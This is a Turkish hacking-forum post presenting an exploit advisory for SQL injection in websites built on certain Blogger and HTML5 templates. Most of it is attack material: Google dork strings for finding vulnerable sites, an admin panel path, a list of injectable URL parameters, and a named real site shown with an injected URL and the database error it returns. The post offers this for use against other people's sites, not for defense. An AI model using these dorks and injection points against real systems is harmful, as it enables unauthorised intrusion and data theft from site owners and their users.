Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: WPExplorer Lasantha PremiumBloggerTemplates SQL Inj
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimiçi
Seviye Puanı: 55
Yaşam Puanı: 1,372 / 1,372
Deneyim: 91 / 100
Rep Sayısı: 2768
Mesaj Sayısı: 6325
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
WPExplorer Lasantha PremiumBloggerTemplates SQL Inj
30.09.2018 01:40
################################################################################​#################

# Exploit Title : Design by WPExplorer Blogger Theme by Lasantha PremiumBloggerTemplates SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/09/2018
# Vendor Homepages : wpex-blogger.blogspot.com ~ wpexplorer.com ~
bloggertipandtrick.net ~ premiumbloggertemplates.com ~ templatemo.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

################################################################################​#################

# Google Dork :

intext:''Copyright © 2018 WPEX Blogger | Powered by Blogger
Design by WPExplorer | Blogger Theme by Lasantha - PremiumBloggerTemplates.com''

intext:''Free HTML5 Template by Matrix''

# Admin Panel Path => /synkro/admin/

# SQL Injection Exploits :

/synkro/events.php?id=[SQL Injection]

/PATH/events.php?id=[SQL Injection]

/synkro/[email protected]@&ref=[SQL Injection]

/PATH/[email protected]@&ref=[SQL Injection]

/news.php?id=[SQL Injection]

/events.php?ref=[SQL Injection]

/photos.php?ref=[SQL Injection]

/videos.php?ref=[SQL Injection]

/musics.php?ref=[SQL Injection]

/alerts.php?ref=[SQL Injection]

################################################################################​#################

# Example Vulnerable Site => prokode.fr/synkro/events.php?id=155%27 => [ Proof of Concept ] => archive.is/K2Jon

# SQL Database Error =>

Erreur SQL !
SELECT id,feed_id,type,state,title,date,start,end,author,text,image,lat,lon,fb_id,tw_id​,gp_id,fb_date,tw_date,gp_date,
fb_link,tw_link,gp_link FROM events WHERE id=155' AND state=1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near '' AND state=1' at line 1

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.



Alinti



1 Ziyaretçi